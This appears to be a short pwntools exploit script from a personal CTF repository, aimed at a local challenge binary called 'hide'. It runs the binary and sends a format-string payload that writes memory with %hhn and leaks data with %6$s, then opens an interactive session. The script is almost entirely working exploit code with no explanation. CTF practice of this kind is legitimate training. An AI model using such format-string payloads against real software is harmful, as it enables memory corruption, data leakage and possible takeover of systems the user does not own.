Files
ctfs/random_challs/hide/a.py
T
2025-05-11 22:17:10 +03:00

14 lines
189 B
Python

#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./hide", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# buf
s(b"%160c%hhn%6$s")
r.interactive()